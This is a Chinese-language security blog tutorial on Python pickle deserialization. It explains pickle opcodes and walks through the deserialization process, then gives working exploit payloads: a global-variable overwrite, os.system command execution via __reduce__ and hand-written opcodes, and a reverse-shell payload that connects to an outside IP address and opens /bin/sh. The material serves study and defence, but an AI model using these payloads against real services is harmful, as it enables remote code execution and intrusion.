
<!DOCTYPE html>
<html lang="zh-CN ">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hoylindo || Python反序列化（一）</title>
    <meta name="author" content="hoylindo">
    <meta name="description" content="嗨，这里是一个搭建的不太熟练的小破站 ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/1.jpg">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/maiden-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<meta name="generator" content="Hexo 5.4.2"></head>

<body>

    <div id="loading"
        style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div
            style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent"
                style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#fba3cf; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p>dadada~</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">Hoylindo</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled" />
            </span>
            <span>home</span>
        </a>
        
        <a href="/about">
            <span>
                <a-icon type="idcard" theme="filled" />
            </span>
            <span>about</span>
        </a>
        
        <a href="/archives">
            <span>
                <a-icon type="folder" theme="filled" />
            </span>
            <span>archives</span>
        </a>
        
        <a href="/categories">
            <span>
                <a-icon type="book" theme="filled" />
            </span>
            <span>categories</span>
        </a>
        
        <a href="/tags">
            <span>
                <a-icon type="tags" theme="filled" />
            </span>
            <span>tags</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled" />
            </span>
            <span>Hoylindo</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="idcard" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="folder" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">archives</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="book" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">categories</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="tags" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">tags</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1>Python反序列化（一） </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled" />
            </span>
            2022/11/12
        </span>

        
        <span class="category">
            <a href="/categories/关于web安全">
                <span class="icon">
                    <a-icon type="book" theme="filled" />
                </span>
                关于web安全
            </a>
        </span>
        

        

        <span class="tags">
            <span class="icon">
                <a-icon type="tags" theme="filled" />
            </span>
            
            <span class="tag">
                
                <a href="/tags/Python" style=color:#ffa2c4>
                    Python
                </a>
            </span>
            
        </span>
        
    </div>

    <div class="content" v-pre>
        <br>

<span id="more"></span>

<h2 id="Python反序列化"><a href="#Python反序列化" class="headerlink" title="Python反序列化"></a>Python反序列化</h2><h3 id="定义"><a href="#定义" class="headerlink" title="定义"></a>定义</h3><ul>
<li>Python中有两个模块可以实现对象的序列化，<code>pickle</code>和<code>cPickle</code>，区别在于<code>cPickle</code>是用C语言实现的，<code>pickle</code>是用纯python语言实现的，用法类似，cPickle的读写效率高一些；使用时一般先尝试导入cPickle，如果失败，再导入pickle模块</li>
<li>pickle的应用场景一般有以下几种：<ul>
<li> 在解析认证token，session的时候（尤其web中使用的redis、mongodb、memcached等来存储session等状态信息）</li>
<li> 将对象Pickle后存储成磁盘文件</li>
<li> 将对象Pickle后在网络中传输</li>
</ul>
</li>
<li>漏洞成因：pickle数据是完全可控的，可以用来表示任意对象</li>
</ul>
<h3 id="方法"><a href="#方法" class="headerlink" title="方法"></a>方法</h3><ul>
<li><code>pickle.dump(obj, file)</code>：将obj对象进行封存，即序列化，然后写入到file文件中，这里的file需要以<code>wb</code>打开(二进制可写模式)</li>
<li><code>pickle.load(file)</code>：将file这个文件进行解封，即反序列化，这里的file需要以<code>rb</code>打开(二进制可读模式)</li>
<li><code>pickle.dumps(obj)</code>：将obj对象进行封存，即序列化，然后将其作为bytes类型直接返回</li>
<li><code>pickle.loads(data)</code>：将data解封，即进行反序列化，data要求为bytes-like object(字节类对象)</li>
</ul>
<h3 id="关于opcode"><a href="#关于opcode" class="headerlink" title="关于opcode"></a>关于opcode</h3><ul>
<li><p><code>opcode</code>，即序列化后的字符，它们都有一定的含义，可以通过编写opcode实现函数执行</p>
</li>
<li><p>pickle有6种不同的实现版本，在py3和py2中得到的opcode不相同，但是pickle可以向下兼容（所以用v0就可以在所有版本中执行）</p>
</li>
<li><p>版本0的opcode更方便阅读，所以手动编写时，一般选用版本0的opcode</p>
</li>
<li><p>直接编写的opcode灵活性比使用pickle序列化生成的代码更高，只要符合pickle语法，就可以进行变量覆盖、函数执行等操作</p>
</li>
<li><p>抄一个大佬的表格：</p>
<table>
<thead>
<tr>
<th>opcode</th>
<th>描述</th>
<th>具体写法</th>
<th>栈上的变化</th>
<th>memo上的变化</th>
</tr>
</thead>
<tbody><tr>
<td>c</td>
<td>获取一个全局对象或import一个模块（注：会调用import语句，能够引入新的包）</td>
<td>c[module]\n[instance]\n</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>o</td>
<td>寻找栈中的上一个MARK，以之间的第一个数据（必须为函数）为callable，第二个到第n个数据为参数，执行该函数（或实例化一个对象）</td>
<td>o</td>
<td>这个过程中涉及到的数据都出栈，函数的返回值（或生成的对象）入栈</td>
<td>无</td>
</tr>
<tr>
<td>i</td>
<td>相当于c和o的组合，先获取一个全局函数，然后寻找栈中的上一个MARK，并组合之间的数据为元组，以该元组为参数执行全局函数（或实例化一个对象）</td>
<td>i[module]\n[callable]\n</td>
<td>这个过程中涉及到的数据都出栈，函数返回值（或生成的对象）入栈</td>
<td>无</td>
</tr>
<tr>
<td>N</td>
<td>实例化一个None</td>
<td>N</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>S</td>
<td>实例化一个字符串对象</td>
<td>S’xxx’\n（也可以使用双引号、&#39;等python字符串形式）</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>V</td>
<td>实例化一个UNICODE字符串对象</td>
<td>Vxxx\n</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>I</td>
<td>实例化一个int对象</td>
<td>Ixxx\n</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>F</td>
<td>实例化一个float对象</td>
<td>Fx.x\n</td>
<td>获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>R</td>
<td>选择栈上的第一个对象作为函数、第二个对象作为参数（第二个对象必须为元组），然后调用该函数</td>
<td>R</td>
<td>函数和参数出栈，函数的返回值入栈</td>
<td>无</td>
</tr>
<tr>
<td>.</td>
<td>程序结束，栈顶的一个元素作为pickle.loads()的返回值</td>
<td>.</td>
<td>无</td>
<td>无</td>
</tr>
<tr>
<td>(</td>
<td>向栈中压入一个MARK标记</td>
<td>(</td>
<td>MARK标记入栈</td>
<td>无</td>
</tr>
<tr>
<td>t</td>
<td>寻找栈中的上一个MARK，并组合之间的数据为元组</td>
<td>t</td>
<td>MARK标记以及被组合的数据出栈，获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>)</td>
<td>向栈中直接压入一个空元组</td>
<td>)</td>
<td>空元组入栈</td>
<td>无</td>
</tr>
<tr>
<td>l</td>
<td>寻找栈中的上一个MARK，并组合之间的数据为列表</td>
<td>l</td>
<td>MARK标记以及被组合的数据出栈，获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>]</td>
<td>向栈中直接压入一个空列表</td>
<td>]</td>
<td>空列表入栈</td>
<td>无</td>
</tr>
<tr>
<td>d</td>
<td>寻找栈中的上一个MARK，并组合之间的数据为字典（数据必须有偶数个，即呈key-value对）</td>
<td>d</td>
<td>MARK标记以及被组合的数据出栈，获得的对象入栈</td>
<td>无</td>
</tr>
<tr>
<td>}</td>
<td>向栈中直接压入一个空字典</td>
<td>}</td>
<td>空字典入栈</td>
<td>无</td>
</tr>
<tr>
<td>p</td>
<td>将栈顶对象储存至memo_n</td>
<td>pn\n</td>
<td>无</td>
<td>对象被储存</td>
</tr>
<tr>
<td>g</td>
<td>将memo_n的对象压栈</td>
<td>gn\n</td>
<td>对象被压栈</td>
<td>无</td>
</tr>
<tr>
<td>0</td>
<td>丢弃栈顶对象</td>
<td>0</td>
<td>栈顶对象被丢弃</td>
<td>无</td>
</tr>
<tr>
<td>b</td>
<td>使用栈中的第一个元素（储存多个属性名: 属性值的字典）对第二个元素（对象实例）进行属性设置</td>
<td>b</td>
<td>栈上第一个元素出栈</td>
<td>无</td>
</tr>
<tr>
<td>s</td>
<td>将栈的第一个和第二个对象作为key-value对，添加或更新到栈的第三个对象（必须为列表或字典，列表以数字作为key）中</td>
<td>s</td>
<td>第一、二个元素出栈，第三个元素（列表或字典）添加新值或被更新</td>
<td>无</td>
</tr>
<tr>
<td>u</td>
<td>寻找栈中的上一个MARK，组合之间的数据（数据必须有偶数个，即呈key-value对）并全部添加或更新到该MARK之前的一个元素（必须为字典）中</td>
<td>u</td>
<td>MARK标记以及被组合的数据出栈，字典被更新</td>
<td>无</td>
</tr>
<tr>
<td>a</td>
<td>将栈的第一个元素append到第二个元素(列表)中</td>
<td>a</td>
<td>栈顶元素出栈，第二个元素（列表）被更新</td>
<td>无</td>
</tr>
<tr>
<td>e</td>
<td>寻找栈中的上一个MARK，组合之间的数据并extends到该MARK之前的一个元素（必须为列表）中</td>
<td>e</td>
<td>MARK标记以及被组合的数据出栈，列表被更新</td>
<td></td>
</tr>
</tbody></table>
</li>
<li><p>注： <code>TRUE</code> 可以用 <code>I</code> 表示： <code>b&#39;I01\n&#39;</code> ； <code>FALSE</code> 也可以用 <code>I</code> 表示： <code>b&#39;I00\n&#39;</code> </p>
</li>
<li><p><code>c</code>操作符会尝试<code>import</code>库，所以在<code>pickle.loads</code>时不需要漏洞代码中先引入系统库</p>
</li>
<li><p>pickle不支持列表索引、字典索引、点号取对象属性作为左值，需要索引时只能先获取相应的函数（如<code>getattr</code>、<code>dict.get</code>）才能进行。但是因为存在<code>s</code>、<code>u</code>、<code>b</code>操作符，作为右值是可以的；即，<strong>查值不行，赋值可以</strong>，pickle能够索引查值的操作只有<code>c</code>、<code>i</code></p>
</li>
<li><p><code>s</code>、<code>u</code>、<code>b</code>操作符可以构造并赋值原来没有的属性、键值对</p>
</li>
<li><p><strong>拼接opcode：</strong>将第一个pickle流结尾表示结束的 <code>.</code> 去掉，将第二个pickle流与第一个拼接起来即可</p>
</li>
</ul>
<h3 id="序列化与反序列化分析"><a href="#序列化与反序列化分析" class="headerlink" title="序列化与反序列化分析"></a>序列化与反序列化分析</h3><ul>
<li><p>字符串：</p>
<pre><code class="python">import pickle
zj = &#39;haoye&#39;
filename = &quot;haoye&quot;
# 序列化
with open(filename, &#39;wb&#39;) as f:  # 以二进制可写形式打开haoye这个文件
    pickle.dump(zj, f)  # 将zj这个变量对应的字符串进行序列化并写入到f中
# 读取序列化后生成的文件
with open(filename, &quot;rb&quot;) as f:
    print(f.read())
# 反序列化
with open(filename, &quot;rb&quot;) as f:  # 以二进制可读形式打开haoye这个文件
    print(pickle.load(f))  # 将这个文件进行反序列化并输出
</code></pre>
</li>
<li><p>类和对象的反序列化：</p>
<pre><code class="python">import pickle
class Test:
    def __init__(self, name, age):
        self.name = name
        self.age = age


a = pickle.dumps(Test(&quot;lalala&quot;, &quot;18&quot;))
print(a)
# 输出：b&#39;\x80\x04\x958\x00\x00\x00\x00\x00\x00\x00\x8c\x08__main__\x94\x8c\x04Test\x94\x93\x94)\x81\x94&#125;\x94(\x8c\x04name\x94\x8c\x06lalala\x94\x8c\x03age\x94\x8c\x0218\x94ub.&#39;
</code></pre>
</li>
<li><p>详细分析：</p>
<ol>
<li><p>读取<code>\x80</code>，其对应的是<code>PROTO</code>，这里调用<code>load_proto</code>方法，函数内容是读取下一个字符，读取到<code>\x04</code>，这里的含义是表示这是一个根据四号协议序列化的字符串</p>
</li>
<li><p>读取<code>\x95</code>，其对应的是<code>FRAME</code>，这里调用<code>load_frame</code>方法,函数内容是读取八个字符串,这里是<code>:\x00\x00\x00\x00\x00\x00\x00</code>，然后将其值进行二进制字节流转换赋值给<code>current_frame</code></p>
</li>
<li><p>读取<code>\x8c</code>，其对应的是<code>SHORT_BINUNICODE</code>，对应方法是<code>load_short_binunicode</code>，函数内容是向下读取一位，然后压入栈中，此时：<code>stack:[__main__]</code></p>
</li>
<li><p>读取<code>\x94</code>，其对应的是<code>MEMOIZE</code>，对应方法是<code>load_memoize</code>，函数内容是将栈中-1对应元素赋值给<code>memo[0]</code>,这里的话就是<code>memo[0]=\x08__main</code>，而memo等于<code>&#123;&#125;</code>，就是<code>&#123;\x08__main&#125;</code></p>
</li>
<li><p>读取<code>\x8c</code>，向下读取一位然后压入栈中，下一位是<code>\x04Test</code>，此时：<code>stack:[__main__,Test]</code></p>
</li>
<li><p>读取<code>\x94</code>，将栈中-1对应元素存入<code>memo[1]</code>中，即<code>memo[1]=Test</code></p>
</li>
<li><p>读取<code>\x93</code>，对应函数是<code>load_stack_global</code>，函数内容是将栈中元素取出一个，作为对象名，这里就是<code>name=Test</code>，接下来再取出一个，作为类名，就是<code>module=__main__</code>，然后压入栈中，此时：<code>stack:[&lt;class &#39;__main__.Test&#39;&gt;]</code></p>
</li>
<li><p>读取<code>\x94</code>，将栈中-1对应元素存入<code>memo[2]</code>中，就是将上面的字符串保存到<code>memo[2]</code>中</p>
</li>
<li><p>读取<code>)</code>，对应的是<code>EMPTY_TUPLE</code>，也就是向栈中加入空元组，此时：<code>stack:[&lt;class &#39;__main__.Test&#39;&gt;,()]</code></p>
</li>
<li><p>读取<code>\x81</code>，对应函数是<code>load_newobj</code>，弹出<code>()</code>赋值给<code>args</code>，然后将<code>class &#39;__main__.Test&#39;</code>赋值给<code>cls</code>，接下来<code>cls.__new__(cls,*args)</code>实例化对象，由于<code>args</code>为空，所以这里仍然是一个空的<code>Test</code>对象，此时：<code>stack:[&lt;class &#39;__main__.Test&#39;&gt;]</code></p>
</li>
<li><p>读取<code>\x94</code>，将上面实例化过后的对象存入<code>memo[3]</code></p>
</li>
<li><p>读取<code>&#125;</code>，往栈中压入空的字典，此时：<code>stack:[&lt;class &#39;__main__.Test&#39;&gt;,&#123;&#125;]</code></p>
</li>
<li><p>读取<code>\x94</code>，将上述字符串存入<code>memo[4]</code></p>
</li>
<li><p>读取<code>(</code>，对应方法为<code>load_mark</code>，函数内容是将栈中元素压入到<code>metastack</code>中，然后将栈置空</p>
</li>
<li><p>读取<code>\x8c</code>，向下读取一位压入栈中，下一位是<code>\x04name</code>(\x04代表name的长度)，此时：<code>stack:[name]</code></p>
</li>
<li><p>读取<code>\x94</code>，此时栈中是<code>name</code>，因此就是<code>memo[5]=name</code></p>
</li>
<li><p>读取<code>\x8c</code>，向下读取一位压入栈中，这里的话下一位是<code>\x06lalala</code>，此时：<code>stack:[name,lalala]</code></p>
</li>
<li><p>读取<code>\x94</code>，即<code>memo[6]=lalala</code></p>
</li>
<li><p>读取<code>\x8c</code>，读取下一位<code>\x03age</code>，此时：<code>stack:[name,lalala,age]</code></p>
</li>
<li><p>读取<code>x94</code>，即<code>memo[7]=age</code></p>
</li>
<li><p>读取<code>\x8c</code>，读取下一位<code>\x0218</code>，此时：<code>stack:[name,lalala,age,18]</code></p>
</li>
<li><p>读取<code>\x94</code>，即<code>memo[8]=19</code></p>
</li>
<li><p>读取<code>u</code>，对应函数为<code>load_setitems</code>,将栈赋值给<code>items</code>变量，然后将<code>metastack</code>中的弹出赋值给栈，所以这里的栈就变成了<code>&lt;class &#39;__main__.Test&#39;&gt;,&#123;&#125;</code>，这里的话就是取出<code>__main__.Test</code>作为字典，接下来进行range遍历</p>
<pre><code class="python">__main__.Test[items[0]]=items[1]
__main__.Test[items[2]]=items[3]
即：
__main__.Test[name]=lalala
__main__.Test[age]=18
</code></pre>
<p>此时：<code>stack:[&lt;class &#39;__main__.Test&#39;&gt;,&#123;&#39;name&#39;:&#39;lalala&#39;,&#39;age&#39;:&#39;18&#39;&#125;]</code></p>
</li>
<li><p>读取<code>b</code>，对应方法为<code>load_build</code>，弹出<code>&#123;&#39;name&#39;:&#39;lalala&#39;,&#39;age&#39;:&#39;18&#39;&#125;</code>赋值给<code>state</code>，弹出<code>class &#39;__main__.Test&#39;</code>赋值给<code>inst</code>,如果<code>inst</code>中存在<code>setstate</code>，就用<code>setstate</code>来处理<code>state</code>，否则就存入<code>inst_dict</code>中</p>
</li>
<li><p>读取<code>.</code>，结束反序列化</p>
</li>
</ol>
</li>
<li><p>此处可以通过<code>pickletools</code>来查看：</p>
<pre><code class="python">import pickle
import pickletools

class Test:
    def __init__(self, name, age):
        self.name = name
        self.age = age


a = pickle.dumps(Test(&quot;lalala&quot;, &quot;18&quot;))
print(a)
pickletools.dis(a)
</code></pre>
</li>
</ul>
<h2 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="全局变量覆盖"><a href="#全局变量覆盖" class="headerlink" title="全局变量覆盖"></a>全局变量覆盖</h3><ul>
<li><p>有一个文件<code>flag.py</code>，内容如下：<code>flag = &#39;hao ye!&#39;</code></p>
</li>
<li><p>现在要把它修改成<code>lalala</code>，需要通过<code>c</code>操作符得到全局变量<code>flag</code>，然后利用<code>b</code>操作符修改属性值即可，构造payload如下：</p>
<pre><code class="python">c__main__
flag
(S&#39;flag&#39;
S&#39;lalala&#39;
db.
</code></pre>
</li>
<li><p>代码：</p>
<pre><code class="python">import pickle
import flag
payload = &#39;&#39;&#39;c__main__
flag
(S&#39;flag&#39;
S&#39;lalala&#39;
db.&#39;&#39;&#39;

print(&#39;before:&#39;, flag.flag)
# print(payload.encode())
output = pickle.loads(payload.encode())
print(&#39;output:&#39;, output)
print(&#39;after:&#39;, flag.flag)
</code></pre>
</li>
<li><p>分析：</p>
<ul>
<li>通过 <code>c</code> 获取全局变量 <code>secret</code> ，然后建立一个字典，并使用 <code>b</code> 对<code>secret</code>进行属性设置</li>
</ul>
</li>
</ul>
<h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><ul>
<li><p><code>__reduce__</code>方法：被定义之后，当对象被pickle时就会触发，作用：如果接收到的是字符串，就会把这个字符串当成一个全局变量的名称，然后Python查找它并进去pickle，如果接收到的是元组，这个元组应该包含2-6个元素，其中包括：一个可调用对象，用于创建对象，参数元素，供对象调用</p>
</li>
<li><p>如：</p>
<pre><code class="python">import os
import pickle

class Test(object):
    def __reduce__(self):
        return os.system, (&#39;whoami&#39;,)
a = Test()

payload = pickle.dumps(a)
print(payload)
pickle.loads(payload)
</code></pre>
</li>
<li><p>？实现反弹shell：</p>
<pre><code class="python">import os
import pickle

class Test(object):
    def __reduce__(self):
        b = &quot;&quot;&quot;python -c &#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((
        &quot;124.222.255.142&quot;,7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(
        [&quot;/bin/sh&quot;,&quot;-i&quot;]);&#39;&quot;&quot;&quot;
        return os.system, (b,)

a = Test()
payload = pickle.dumps(a)
print(payload)
pickle.loads(payload)
</code></pre>
</li>
</ul>
<h3 id="编写opcode实现函数执行"><a href="#编写opcode实现函数执行" class="headerlink" title="编写opcode实现函数执行"></a>编写opcode实现函数执行</h3><ul>
<li><p>数执行相关的opcode有三个： <code>R</code> 、 <code>i</code> 、 <code>o</code> </p>
<pre><code class="python"># R:
b&#39;&#39;&#39;cos
system
(S&#39;whoami&#39;
tR.&#39;&#39;&#39;
# i:
b&#39;&#39;&#39;(S&#39;whoami&#39;
ios
system
.&#39;&#39;&#39;
# o:
b&#39;&#39;&#39;(cos
system
S&#39;whoami&#39;
o.&#39;&#39;&#39;
</code></pre>
</li>
<li><p>利用代码：</p>
<pre><code class="python">import pickle

payload = b&#39;&#39;&#39;cos
system
(S&#39;whoami&#39;
tR.&#39;&#39;&#39;
pickle.loads(payload)
</code></pre>
</li>
<li><p><code>b</code>操作符：</p>
<pre><code class="python">b&#39;c__main__\nTest\n)\x81&#125;X\x0C\x00\x00\x00__setstate__cos\nsystem\nsbX\x06\x00\x00\x00whoamib.&#39;
</code></pre>
</li>
<li><p>详细说明：</p>
<ul>
<li>字符<code>c</code>，往后读取两行，得到主函数和类，<code>__main__.Test</code></li>
<li>字符<code>)</code>，向栈中压入空元祖<code>()</code></li>
<li>字符<code>&#125;</code>，向栈中压入空字典<code>&#123;&#125;</code></li>
<li>字符<code>X</code>，读取四位<code>\x0C\x00\x00\x00__setstate__</code>,得到<code>__setstate__</code></li>
<li>字符<code>c</code>，向后读取两行，得到函数<code>os.system</code></li>
<li>字符<code>s</code>，将第一个和第二个元素作为键值对，添加到第三个元素中，此时也就是<code>&#123;__main.Test:()&#125;，__setstate__,os.system</code></li>
<li>字符<code>b</code>，第一个元素出栈，此时也就是<code>&#123;&#39;__setstate__&#39;: os.system&#125;</code>,此时执行一次<code>setstate(state)</code></li>
<li>字符<code>X</code>，往后读取四位<code>x06\x00\x00\x00whoami</code>，即<code>whoami</code></li>
<li>字符<code>b</code>，弹出元素<code>whoami</code>此时<code>state</code>为<code>whoami</code>，执行<code>os.system(whoami)</code></li>
<li>字符<code>.</code>，结束反序列化</li>
</ul>
</li>
<li><p>利用代码：</p>
<pre><code class="python">import pickle

class Test:
    def __init__(self):
        self.name = &quot;lalala&quot;
        
a = b&#39;c__main__\nTest\n)\x81&#125;X\x0C\x00\x00\x00__setstate__cos\nsystem\nsbX\x06\x00\x00\x00whoamib.&#39;
b = pickle.loads(a)
</code></pre>
</li>
</ul>
<p>参考链接：</p>
<p><a target="_blank" rel="noopener" href="https://tttang.com/archive/1782/#toc_pickle">Python pickle反序列化浅析</a></p>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7436#toc-12">pickle反序列化初探</a></p>

    </div>

    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 2022 - 2023 Hoylindo
            <span class="footer-icon">
                <a-icon type="flag" theme="filled" /></span>
            @hoylindo
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <canvas id="background" style="position:fixed;top:0;left:0;width:100vw;height:100vh;pointer-events:none;z-index:-1" ></canvas> 
    <script src="/js/1.js"></script>
    
    <canvas class="fireworks" style="position: fixed; left: 0; top: 0; z-index: 99999999; pointer-events: none;"></canvas>
    <script type="text/javascript" src="/js/aixin.js"></script>
    <script type="text/javascript" src="/js/anime.min.js"></script>
    <script type="text/javascript" src="/js/fireworks.js"></script>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

</body>

</html>